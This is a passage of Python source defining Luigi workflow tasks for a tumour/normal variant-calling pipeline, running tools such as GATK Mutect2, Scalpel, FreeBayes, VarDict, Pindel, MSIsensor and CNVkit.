# cmd = ['./packages/VarDictJava/build/install/VarDict/bin/VarDict', '-G', self.cfg['fasta_file'], '-f', '0.01', '-N', self.case + '_T', '-b', '"%s|%s"' % (self.input()[0][0].path, self.input()[1][0].path), '-z', '-F', '-c', '1', '-S', '2', '-E', '3', '-g', '4', self.cfg['library_bed'], '|', './packages/VarDictJava/VarDict/testsomatic.R', '|', './packages/VarDictJava/VarDict/var2vcf_paired.pl', '-N', '"%s|%s"' % (self.case + '_T', self.case + '_N'), '-f', '0.01', '>%s' % os.path.join(self.vcf_path, 'vardict')]
# else:
cmd = [self.cfg['gatk4_location'], '--java-options', '"-Xmx8g -Xms8g -XX:+UseSerialGC -Djava.io.tmpdir=%s"' % self.cfg['tmp_dir'], 'Mutect2', '-R', self.cfg['fasta_file'], '-I', self.input()[0].path, '-tumor', self.sample, '-L', self.cfg['library_bed'], '--native-pair-hmm-threads', self.max_threads, '-O', self.output()[0].path]
pipeline_utils.command_call(cmd, self.output(), threads_needed=self.max_threads)
class mutect_pon(luigi.Task):
max_threads = luigi.IntParameter()
project_dir = luigi.Parameter()
# case = luigi.Parameter()
# tumor = luigi.Parameter()
# matched_n = luigi.Parameter()
# vcf_path = luigi.Parameter()
case_dict = luigi.DictParameter()
# library_bed = luigi.Parameter()
# fasta_file = luigi.Parameter()
cfg = luigi.DictParameter()
def requires(self):
# if self.matched_n != '':
# return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads), bam_processing.index_bam(sample=self.case + '_N', fastq_file=self.matched_n, project_dir=self.project_dir, max_threads=self.max_threads)]
# else:
return [mutect_single_normal(sample=case_name + '_N', fastq_file=self.case_dict[case_name]['N'], project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg) for case_name in self.case_dict if self.case_dict[case_name]['N'] != '']
def output(self):
return luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'mutect', 'pon.vcf.gz'))
def run(self):
pipeline_utils.confirm_path(self.output().path)
# if self.matched_n:
# cmd = ['./packages/VarDictJava/build/install/VarDict/bin/VarDict', '-G', self.cfg['fasta_file'], '-f', '0.01', '-N', self.case + '_T', '-b', '"%s|%s"' % (self.input()[0][0].path, self.input()[1][0].path), '-z', '-F', '-c', '1', '-S', '2', '-E', '3', '-g', '4', self.cfg['library_bed'], '|', './packages/VarDictJava/VarDict/testsomatic.R', '|', './packages/VarDictJava/VarDict/var2vcf_paired.pl', '-N', '"%s|%s"' % (self.case + '_T', self.case + '_N'), '-f', '0.01', '>%s' % os.path.join(self.vcf_path, 'vardict')]
# else:
cmd = [self.cfg['gatk4_location'], 'CreateSomaticPanelOfNormals']
for normal_vcf in self.input():
cmd.append('--vcfs')
cmd.append(normal_vcf[0].path)
cmd.append('--output')
cmd.append(self.output().path)
pipeline_utils.command_call(cmd, [self.output()])
class mutect(luigi.Task):
max_threads = luigi.IntParameter()
case = luigi.Parameter()
tumor = luigi.Parameter()
matched_n = luigi.Parameter()
vcf_path = luigi.Parameter()
project_dir = luigi.Parameter()
case_dict = luigi.DictParameter()
# gatk4_location = luigi.Parameter()
# gatk3_location = luigi.Parameter()
# dbsnp = luigi.Parameter()
# germline_resource = luigi.Parameter()
# library_bed = luigi.Parameter()
# fasta_file = luigi.Parameter()
# fasta_dir = os.path.join('/', *luigi.Parameter().task_value('bowtie', 'fasta_file').split('/')[:-1])
cfg = luigi.DictParameter()
def requires(self):
if self.matched_n != '':
return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg), bam_processing.index_bam(sample=self.case + '_N', fastq_file=self.matched_n, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg), mutect_pon(case_dict=self.case_dict, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)]
else:
return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg), mutect_pon(case_dict=self.case_dict, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)]
def output(self):
return [luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_mutect.vcf.gz')), luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_mutect.vcf.gz.tbi'))]
def run(self):
for output in self.output():
pipeline_utils.confirm_path(output.path)
if self.matched_n:
cmd = [self.cfg['gatk4_location'], '--java-options', '"-Xmx8g -Xms8g -XX:+UseSerialGC -Djava.io.tmpdir=%s"' % self.cfg['tmp_dir'], 'Mutect2', '-R', self.cfg['fasta_file'], '-I', self.input()[0][0].path, '-tumor', self.case + '_T', '-I', self.input()[1][0].path, '-normal', self.case + '_N', '--germline-resource', self.cfg['germline_resource'], '--af-of-alleles-not-in-resource', '0.0000025', '-L', self.cfg['library_bed'], '-pon', self.input()[-1].path, '--native-pair-hmm-threads', self.max_threads, '-O', self.output()[0].path]
else:
cmd = [self.cfg['gatk4_location'], '--java-options', '"-Xmx8g -Xms8g -XX:+UseSerialGC -Djava.io.tmpdir=%s"' % self.cfg['tmp_dir'], 'Mutect2', '-R', self.cfg['fasta_file'], '-I', self.input()[0][0].path, '-tumor', self.case + '_T', '--germline-resource', self.cfg['germline_resource'], '--af-of-alleles-not-in-resource', '0.0000025', '-L', self.cfg['library_bed'], '-pon', self.input()[-1].path, '--native-pair-hmm-threads', self.max_threads, '-O', self.output()[0].path]
pipeline_utils.command_call(cmd, self.output(), threads_needed=self.max_threads)
class filter_mutect(luigi.Task):
max_threads = luigi.IntParameter()
case = luigi.Parameter()
tumor = luigi.Parameter()
matched_n = luigi.Parameter()
vcf_path = luigi.Parameter()
project_dir = luigi.Parameter()
case_dict = luigi.DictParameter()
# gatk4_location = luigi.Parameter()
# fasta_file = luigi.Parameter()
# fasta_dir = os.path.join('/', *luigi.Parameter().task_value('bowtie', 'fasta_file').split('/')[:-1])
cfg = luigi.DictParameter()
def requires(self):
return mutect(project_dir=self.project_dir, vcf_path=self.vcf_path, case=self.case, tumor=self.tumor, matched_n=self.matched_n, max_threads=self.max_threads, case_dict=self.case_dict, cfg=self.cfg)
def output(self):
return luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_mutect_filtered' + '.vcf.gz'))
def run(self):
pipeline_utils.confirm_path(self.output().path)
cmd = [self.cfg['gatk4_location'], '--java-options', '"-Xmx8g -Xms8g -XX:+UseSerialGC -Djava.io.tmpdir=%s"' % self.cfg['tmp_dir'], 'FilterMutectCalls', '-V', self.input()[0].path, '-O', self.output().path]
pipeline_utils.command_call(cmd, [self.output()], sleep_time=1.1)
# for input_file in self.input():
# input_file.remove()
class sort_mutect(luigi.Task):
max_threads = luigi.IntParameter()
project_dir = luigi.Parameter()
case = luigi.Parameter()
tumor = luigi.Parameter()
matched_n = luigi.Parameter()
vcf_path = luigi.Parameter()
case_dict = luigi.DictParameter()
cfg = luigi.DictParameter()
def requires(self):
return [filter_mutect(max_threads=self.max_threads, project_dir=self.project_dir, case=self.case, tumor=self.tumor, matched_n=self.matched_n, vcf_path=self.vcf_path, case_dict=self.case_dict, cfg=self.cfg),
bam_processing.picard_index(cfg=self.cfg)]
def output(self):
return luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_mutect_sorted' + '.vcf'))
def run(self):
pipeline_utils.confirm_path(self.output().path)
cmd = ['java', '-jar', self.cfg['picard_location'], 'SortVcf', 'I=%s' % self.input()[0].path, 'O=%s' % self.output().path, 'SEQUENCE_DICTIONARY=%s' % self.input()[1].path]
pipeline_utils.command_call(cmd, [self.output()], threads_needed=self.max_threads)
class scalpel_discovery(luigi.Task):
max_threads = luigi.IntParameter()
project_dir = luigi.Parameter()
case = luigi.Parameter()
tumor = luigi.Parameter()
matched_n = luigi.Parameter()
vcf_path = luigi.Parameter()
# library_bed = luigi.Parameter()
# fasta_file = luigi.Parameter()
cfg = luigi.DictParameter()
def requires(self):
if self.matched_n != '':
return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg), bam_processing.index_bam(sample=self.case + '_N', fastq_file=self.matched_n, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)]
else:
return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)]
def output(self):
if self.matched_n != '':
return luigi.LocalTarget(os.path.join(self.vcf_path, 'scalpel', 'twopass', 'somatic.db.dir'))
else:
return luigi.LocalTarget(os.path.join(self.vcf_path, 'scalpel', 'variants.db.dir'))
def run(self):
pipeline_utils.confirm_path(self.output().path)
if self.matched_n:
cmd = ['./packages/scalpel-0.5.4/scalpel-discovery', '--somatic', '--normal', self.input()[1][0].path, '--tumor', self.input()[0][0].path, '--bed', self.cfg['library_bed'], '--ref', self.cfg['fasta_file'], '--two-pass', '--dir', os.path.join(self.vcf_path, 'scalpel'), '--numprocs', str(self.max_threads)]
else:
cmd = ['./packages/scalpel-0.5.4/scalpel-discovery', '--single', '--bam', self.input()[0][0].path, '--bed', self.cfg['library_bed'], '--ref', self.cfg['fasta_file'], '--dir', os.path.join(self.vcf_path, 'scalpel'), '--numprocs', str(self.max_threads)]
pipeline_utils.command_call(cmd, [self.output()], threads_needed=self.max_threads)
class scalpel_export(luigi.Task):
max_threads = luigi.IntParameter()
project_dir = luigi.Parameter()
case = luigi.Parameter()
tumor = luigi.Parameter()
matched_n = luigi.Parameter()
vcf_path = luigi.Parameter()
# library_bed = luigi.Parameter()
# fasta_file = luigi.Parameter()
# fasta_dir = os.path.join('/', *luigi.Parameter().task_value('bowtie', 'fasta_file').split('/')[:-1])
cfg = luigi.DictParameter()
def requires(self):
# if self.matched_n != '':
return scalpel_discovery(case=self.case, tumor=self.tumor, matched_n=self.matched_n, project_dir=self.project_dir, vcf_path=self.vcf_path, max_threads=self.max_threads, cfg=self.cfg) #, scalpel_discovery(case=self.case + '_N', fastq_file=self.matched_n, project_dir=self.project_dir, max_threads=int(self.max_threads/2))]
# else:
# return scalpel_discovery(case=self.case + '_T', tumor=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads)
def output(self):
if self.matched_n != '':
return luigi.LocalTarget(os.path.join(self.vcf_path, 'scalpel', 'twopass', 'somatic.indel.vcf'))
else:
return luigi.LocalTarget(os.path.join(self.vcf_path, 'scalpel', 'variants.indel.vcf'))
def run(self):
pipeline_utils.confirm_path(self.output().path)
if self.matched_n:
cmd = ['./packages/scalpel-0.5.4/scalpel-export', '--somatic', '--db', self.input().path[:-4], '--bed', self.cfg['library_bed'], '--ref', self.cfg['fasta_file']]
else:
cmd = ['./packages/scalpel-0.5.4/scalpel-export', '--single', '--db', self.input().path[:-4], '--bed', self.cfg['library_bed'], '--ref', self.cfg['fasta_file']]
pipeline_utils.command_call(cmd, [self.output()], sleep_time=1.1)
# not yet tested - need to install GNU Parallel on cluster... but might be able to run local install http://git.savannah.gnu.org/cgit/parallel.git/tree/README
class freebayes(luigi.Task):
max_threads = luigi.IntParameter()
project_dir = luigi.Parameter()
case = luigi.Parameter()
tumor = luigi.Parameter()
matched_n = luigi.Parameter()
vcf_path = luigi.Parameter()
# library_bed = luigi.Parameter()
# fasta_file = luigi.Parameter()
cfg = luigi.DictParameter()
def requires(self):
return bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)
def output(self):
return luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_freebayes' + '.vcf'))
def run(self):
pipeline_utils.confirm_path(self.output().path)
wait_time = random.uniform(0,3)
time.sleep(wait_time)
sys.stdout.flush()
while not pipeline_utils.add_thread_count(global_vars.thread_file, 1):
time.sleep(1)
cmd = [self.cfg['freebayes_location'], '-f', self.cfg['fasta_file'], '-t', self.cfg['library_bed'], self.input()[0].path]
print(' '.join(cmd))
sys.stdout.flush()
p1 = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, shell=True)
# outs, err = p.communicate()
cmd = [self.cfg['vcffilter_location'], '-f', '"QUAL > 20"']
p2 = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stdin=p1.stdout, shell=True)
cmd = ['vcf-sort']
p3 = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stdin=p2.stdout, shell=True)
# outs, err = p.communicate()
outs, err = p3.communicate()
with open(self.output().path, 'wb') as f:
f.write(outs)
while not pipeline_utils.sub_thread_count(global_vars.thread_file, 1):
time.sleep(1)
class sort_freebayes(luigi.Task):
max_threads = luigi.IntParameter()
project_dir = luigi.Parameter()
case = luigi.Parameter()
tumor = luigi.Parameter()
matched_n = luigi.Parameter()
vcf_path = luigi.Parameter()
cfg = luigi.DictParameter()
def requires(self):
return [freebayes(max_threads=self.max_threads, project_dir=self.project_dir, case=self.case, tumor=self.tumor, matched_n=self.matched_n, vcf_path=self.vcf_path, cfg=self.cfg),
bam_processing.picard_index(cfg=self.cfg)]
def output(self):
return luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_freebayes_sorted' + '.vcf'))
def run(self):
pipeline_utils.confirm_path(self.output().path)
cmd = ['java', '-jar', self.cfg['picard_location'], 'SortVcf', 'I=%s' % self.input()[0].path, 'O=%s' % self.output().path, 'SEQUENCE_DICTIONARY=%s' % self.input()[1].path]
pipeline_utils.command_call(cmd, [self.output()], threads_needed=self.max_threads)
class vardict(luigi.Task):
max_threads = luigi.IntParameter()
project_dir = luigi.Parameter()
case = luigi.Parameter()
tumor = luigi.Parameter()
matched_n = luigi.Parameter()
vcf_path = luigi.Parameter()
cfg = luigi.DictParameter()
def requires(self):
if self.matched_n != '':
return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg), bam_processing.index_bam(sample=self.case + '_N', fastq_file=self.matched_n, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)]
else:
return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)]
def output(self):
return luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_vardict' + '.vcf'))
def run(self):
pipeline_utils.confirm_path(self.output().path)
if self.matched_n:
cmd = ['./packages/VarDictJava/build/install/VarDict/bin/VarDict', '-G', self.cfg['fasta_file'], '-f', '0.01', '-N', self.case + '_T', '-b', '"%s|%s"' % (self.input()[0][0].path, self.input()[1][0].path), '-th', self.max_threads, '-z', '-c', '1', '-S', '2', '-E', '3', '-g', '4', self.cfg['library_bed'], '|', './packages/VarDictJava/VarDict/testsomatic.R', '|', './packages/VarDictJava/VarDict/var2vcf_paired.pl', '-N', '"%s|%s"' % (self.case + '_T', self.case + '_N'), '-f', '0.01', '>%s' % self.output().path]
else:
cmd = ['./packages/VarDictJava/build/install/VarDict/bin/VarDict', '-G', self.cfg['fasta_file'], '-f', '0.01', '-N', self.case + '_T', '-b', self.input()[0][0].path, '-th', self.max_threads, '-z', '-c', '1', '-S', '2', '-E', '3', '-g', '4', self.cfg['library_bed'], '|', './packages/VarDictJava/VarDict/teststrandbias.R', '|', './packages/VarDictJava/VarDict/var2vcf_valid.pl', '-N', self.case + '_T', '-E', '-f', '0.01', '>%s' % self.output().path]
pipeline_utils.command_call(cmd, [self.output()], threads_needed=self.max_threads)
class sort_vardict(luigi.Task):
max_threads = luigi.IntParameter()
project_dir = luigi.Parameter()
case = luigi.Parameter()
tumor = luigi.Parameter()
matched_n = luigi.Parameter()
vcf_path = luigi.Parameter()
cfg = luigi.DictParameter()
def requires(self):
return [vardict(max_threads=self.max_threads, project_dir=self.project_dir, case=self.case, tumor=self.tumor, matched_n=self.matched_n, vcf_path=self.vcf_path, cfg=self.cfg),
bam_processing.picard_index(cfg=self.cfg)]
def output(self):
return luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_vardict_sorted' + '.vcf'))
def run(self):
pipeline_utils.confirm_path(self.output().path)
cmd = ['java', '-jar', self.cfg['picard_location'], 'SortVcf', 'I=%s' % self.input()[0].path, 'O=%s' % self.output().path, 'SEQUENCE_DICTIONARY=%s' % self.input()[1].path]
pipeline_utils.command_call(cmd, [self.output()], threads_needed=self.max_threads)
# this will be pretty annoying to get up and going
class varscan(luigi.Task):
max_threads = luigi.IntParameter()
project_dir = luigi.Parameter()
case = luigi.Parameter()
tumor = luigi.Parameter()
matched_n = luigi.Parameter()
vcf_path = luigi.Parameter()
# library_bed = luigi.Parameter()
# fasta_file = luigi.Parameter()
cfg = luigi.DictParameter()
def requires(self):
if self.matched_n != '':
return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg), bam_processing.index_bam(sample=self.case + '_N', fastq_file=self.matched_n, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)]
else:
return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)]
def output(self):
return luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_varscan' + '.vcf'))
def run(self):
pipeline_utils.confirm_path(self.output().path)
if self.matched_n:
cmd = ['./packages/VarDictJava/build/install/VarDict/bin/VarDict', '-G', self.cfg['fasta_file'], '-f', '0.01', '-N', self.case + '_T', '-b', '"%s|%s"' % (self.input()[0][0].path, self.input()[1][0].path), '-z', '-F', '-c', '1', '-S', '2', '-E', '3', '-g', '4', self.cfg['library_bed'], '|', './packages/VarDictJava/VarDict/testsomatic.R', '|', './packages/VarDictJava/VarDict/var2vcf_paired.pl', '-N', '"%s|%s"' % (self.case + '_T', self.case + '_N'), '-f', '0.01', '> %s' % os.path.join(self.vcf_path, 'vardict')]
else:
cmd = ['./packages/VarDictJava/build/install/VarDict/bin/VarDict', '-G', self.cfg['fasta_file'], '-f', '0.01', '-N', self.case + '_T', '-b', self.input()[0][0].path, '-z', '-c', '1', '-S', '2', '-E', '3', '-g', '4', self.cfg['library_bed'], '|', './packages/VarDictJava/VarDict/teststrandbias.R', '|', './packages/VarDictJava/VarDict/var2vcf_valid.pl', '-N', self.case + '_T', 'E', '-f', '0.01', '> %s' % os.path.join(self.vcf_path, 'vardict')]
pipeline_utils.command_call(cmd, [self.output()])
class pindel(luigi.Task):
max_threads = luigi.IntParameter()
project_dir = luigi.Parameter()
# case = luigi.Parameter()
# tumor = luigi.Parameter()
# matched_n = luigi.Parameter()
# vcf_path = luigi.Parameter()
case_dict = luigi.DictParameter()
# library_bed = luigi.Parameter()
# fasta_file = luigi.Parameter()
cfg = luigi.DictParameter()
def requires(self):
return [bam_processing.index_bam(sample=case_name + '_N', fastq_file=self.case_dict[case_name]['N'], project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg) for case_name in self.case_dict if self.case_dict[case_name]['N'] != ''] \
+ [bam_processing.index_bam(sample=case_name + '_T', fastq_file=self.case_dict[case_name]['T'], project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg) for case_name in self.case_dict]
def output(self):
pindel_files = ['_D', '_SI', '_TD', '_INV'] #, '_LI', '_BP',
return [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'pindel', 'pindel_all_samples' + ext)) for ext in pindel_files]
def run(self):
for output in self.output():
pipeline_utils.confirm_path(output.path)
with open('___pindel_bams___.txt', 'w') as f:
for input_bam in self.input():
case = input_bam[0].path.split('/')[-1].split('_')[0]
if '_N' in input_bam[0].path:
f.write('%s %s %s\n' % (input_bam[0].path, self.cfg['insert_size'], case + '_N'))
else:
f.write('%s %s %s\n' % (input_bam[0].path, self.cfg['insert_size'], case + '_T'))
cmd = ['./packages/pindel/pindel', '-f', self.cfg['fasta_file'], '-i', '___pindel_bams___.txt', '-T', self.max_threads, '-c', 'ALL', '-o', os.path.join(self.project_dir, 'output', 'pindel', 'pindel_all_samples')]
pipeline_utils.command_call(cmd, self.output(), threads_needed=self.max_threads)
os.remove('___pindel_bams___.txt')
class filter_pindel(luigi.Task):
max_threads = luigi.IntParameter()
project_dir = luigi.Parameter()
# case = luigi.Parameter()
# tumor = luigi.Parameter()
# matched_n = luigi.Parameter()
# vcf_path = luigi.Parameter()
case_dict = luigi.DictParameter()
# library_bed = luigi.Parameter()
# fasta_file = luigi.Parameter()
cfg = luigi.DictParameter()
def requires(self):
return pindel(case_dict=self.case_dict, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)
def output(self):
return [luigi.LocalTarget(os.path.join(self.project_dir, 'output', case_name, 'variants', case_name + '_T.pindel.bed')) for case_name in self.case_dict] + \
[luigi.LocalTarget(os.path.join(self.project_dir, 'output', case_name, 'variants', case_name + '_N.pindel.bed')) for case_name in self.case_dict if self.case_dict[case_name]['N'] != ''] + \
[luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'all_samples', 'all_samples_pindel.tsv'))]
def run(self):
for output in self.output():
pipeline_utils.confirm_path(output.path)
wait_time = random.uniform(0,3)
time.sleep(wait_time)
sys.stdout.flush()
while not pipeline_utils.add_thread_count(global_vars.thread_file, 1):
time.sleep(1.2)
sample_dict = {output.path.split('/')[-1].split('.pindel.bed')[0]: output.path for output in self.output()[:-1]}
misc_utils.filter_pindel(pindel_files=[input_file.path for input_file in self.input()], sample_dict=sample_dict, project_dir=self.project_dir, all_samples_output=self.output()[-1].path, min_reads=self.cfg['pindel_min_reads'], min_qual=self.cfg['pindel_min_qual'], max_inv_length=self.cfg['pindel_max_inv_length'])
while not pipeline_utils.sub_thread_count(global_vars.thread_file, 1):
time.sleep(1.2)
class annotate_pindel(luigi.Task):
max_threads = luigi.IntParameter()
project_dir = luigi.Parameter()
# case = luigi.Parameter()
# tumor = luigi.Parameter()
# matched_n = luigi.Parameter()
# vcf_path = luigi.Parameter()
case_dict = luigi.DictParameter()
# library_bed = luigi.Parameter()
# fasta_file = luigi.Parameter()
cfg = luigi.DictParameter()
def requires(self):
return filter_pindel(case_dict=self.case_dict, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)
def output(self):
outputs = []
for input_file in self.input()[:-1]:
output_file = input_file.path.split('.bed')[0] + '_final.bed'
outputs.append(luigi.LocalTarget(output_file))
return outputs
def run(self):
for output in self.output():
pipeline_utils.confirm_path(output.path)
wait_time = random.uniform(0,3)
time.sleep(wait_time)
sys.stdout.flush()
while not pipeline_utils.add_thread_count(global_vars.thread_file, 1):
time.sleep(1.2)
for i, input_file in enumerate(self.input()[:-1]):
cmd = 'sort-bed %s' % input_file.path
# print(cmd)
p1 = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
cmd = ['bedtools', 'intersect', '-wa', '-u', '-sorted', '-a', 'stdin', '-b', self.cfg['exons_bed']]
cmd = ' '.join(cmd)
p2 = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=p1.stdout, shell=True)
# print(cmd)
cmd = ["bedmap", "--echo", "--echo-map-id-uniq", "--delim", r"'\t'", "-", self.cfg['genmap']]
cmd = " ".join(cmd)
# print(cmd)
p3 = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=p2.stdout, shell=True)
outs, err = p3.communicate()
with open(self.output()[i].path, 'wb') as f:
f.write(str.encode('#gffTags\n'))
f.write(outs)
while not pipeline_utils.sub_thread_count(global_vars.thread_file, 1):
time.sleep(1.2)
class filter_pindel_old(luigi.Task):
max_threads = luigi.IntParameter()
project_dir = luigi.Parameter()
# case = luigi.Parameter()
# tumor = luigi.Parameter()
# matched_n = luigi.Parameter()
# vcf_path = luigi.Parameter()
case_dict = luigi.DictParameter()
# library_bed = luigi.Parameter()
# fasta_file = luigi.Parameter()
cfg = luigi.DictParameter()
def requires(self):
return pindel(case_dict=self.case_dict, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)
def output(self):
return [luigi.LocalTarget(input_file.path + '.filtered.tsv') for input_file in self.input()]
def run(self):
for output in self.output():
pipeline_utils.confirm_path(output.path)
wait_time = random.uniform(0,3)
time.sleep(wait_time)
sys.stdout.flush()
while not pipeline_utils.add_thread_count(global_vars.thread_file, 1):
time.sleep(1.2)
for i, input_file in enumerate(self.input()):
cmd = 'grep "ChrID" %s' % input_file.path #| awk '$17 >= 3' > $file_out
p1 = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
# outs, err = p.communicate()
cmd = "awk '$17>=%s'" % self.cfg['pindel_min_reads']
p2 = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=p1.stdout, shell=True)
# outs, err = p.communicate()
outs, err = p2.communicate()
with open(self.output()[i].path, 'wb') as f:
f.write(outs)
while not pipeline_utils.sub_thread_count(global_vars.thread_file, 1):
time.sleep(1.2)
class parse_pindel(luigi.Task):
max_threads = luigi.IntParameter()
project_dir = luigi.Parameter()
# case = luigi.Parameter()
# tumor = luigi.Parameter()
# matched_n = luigi.Parameter()
# vcf_path = luigi.Parameter()
case_dict = luigi.DictParameter()
# library_bed = luigi.Parameter()
# fasta_file = luigi.Parameter()
cfg = luigi.DictParameter()
def requires(self):
return filter_pindel(case_dict=self.case_dict, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)
def output(self):
return [luigi.LocalTarget(os.path.join(self.project_dir, 'output', case_name, 'variants', case_name + '_T.pindel.bed')) for case_name in self.case_dict] + \
[luigi.LocalTarget(os.path.join(self.project_dir, 'output', case_name, 'variants', case_name + '_N.pindel.bed')) for case_name in self.case_dict if self.case_dict[case_name]['N'] != ''] + \
[luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'all_samples', 'all_samples_pindel.tsv'))]
def run(self):
for output in self.output():
pipeline_utils.confirm_path(output.path)
wait_time = random.uniform(0,3)
time.sleep(wait_time)
sys.stdout.flush()
while not pipeline_utils.add_thread_count(global_vars.thread_file, 1):
time.sleep(1.2)
sample_dict = {output.path.split('/')[-1].split('.pindel.bed')[0]: output.path for output in self.output()[:-1]}
misc_utils.format_pindel(pindel_files=[input_file.path for input_file in self.input()], sample_dict=sample_dict, project_dir=self.project_dir, all_samples_output=self.output()[-1].path, min_reads=self.cfg['pindel_min_reads'])
while not pipeline_utils.sub_thread_count(global_vars.thread_file, 1):
time.sleep(1.2)
class pindel2vcf(luigi.Task):
max_threads = luigi.IntParameter()
project_dir = luigi.Parameter()
# case = luigi.Parameter()
# tumor = luigi.Parameter()
# matched_n = luigi.Parameter()
# vcf_path = luigi.Parameter()
case_dict = luigi.DictParameter()
# library_bed = luigi.Parameter()
# fasta_file = luigi.Parameter()
cfg = luigi.DictParameter()
def requires(self):
return pindel(case_dict=self.case_dict, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)
def output(self):
return luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'pindel', 'pindel_all_samples.vcf'))
def run(self):
pindel_input = '_'.join(self.input()[0].path.split('_')[:-1])
pipeline_utils.confirm_path(self.output().path)
cmd = ['./packages/pindel/pindel2vcf', '-r', self.cfg['fasta_file'], '-G', '-R', self.cfg['base_name'], '-d', 'idk', '-P', pindel_input, '-v', self.output().path]
pipeline_utils.command_call(cmd, [self.output()])
class msisensor(luigi.Task):
max_threads = luigi.IntParameter()
project_dir = luigi.Parameter()
case = luigi.Parameter()
tumor = luigi.Parameter()
matched_n = luigi.Parameter()
vcf_path = luigi.Parameter()
cfg = luigi.DictParameter()
def requires(self):
return bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)
def output(self):
return luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_T.msisensor'))
def run(self):
pipeline_utils.confirm_path(self.output().path)
cmd = ['./packages/msisensor/binary/msisensor.linux', 'msi', '-d', './packages/msisensor/microsatellites.list', '-t', self.input()[0].path, '-e', self.cfg['library_bed'], '-o', self.output().path] # , '-b', self.max_threads
pipeline_utils.command_call(cmd, [self.output()]) # , threads_needed=self.max_threads)
class cnvkit(luigi.Task):
max_threads = luigi.IntParameter()
project_dir = luigi.Parameter()
# case = luigi.Parameter()
# tumor = luigi.Parameter()
# matched_n = luigi.Parameter()
# vcf_path = luigi.Parameter()
case_dict = luigi.DictParameter()
# library_bed = luigi.Parameter()
# fasta_file = luigi.Parameter()
cfg = luigi.DictParameter()
def requires(self):
# if self.matched_n != '':
# return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads), bam_processing.index_bam(sample=self.case + '_N', fastq_file=self.matched_n, project_dir=self.project_dir, max_threads=self.max_threads)]
# else:
return [bam_processing.index_bam(sample=case_name + '_N', fastq_file=self.case_dict[case_name]['N'], project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg) for case_name in self.case_dict if self.case_dict[case_name]['N'] != ''] \
+ [bam_processing.index_bam(sample=case_name + '_T', fastq_file=self.case_dict[case_name]['T'], project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg) for case_name in self.case_dict]
def output(self):
return [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'cnvkit', 'reference', 'reference.cnn'))] \
+ [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'cnvkit', 'variants', '%s_T_recalibrated.cnr' % case_name)) for case_name in self.case_dict] \
+ [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'cnvkit', 'variants', '%s_T_recalibrated.cns' % case_name)) for case_name in self.case_dict] \
+ [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'cnvkit', 'variants', '%s_T_recalibrated.targetcoverage.cnn' % case_name)) for case_name in self.case_dict] \
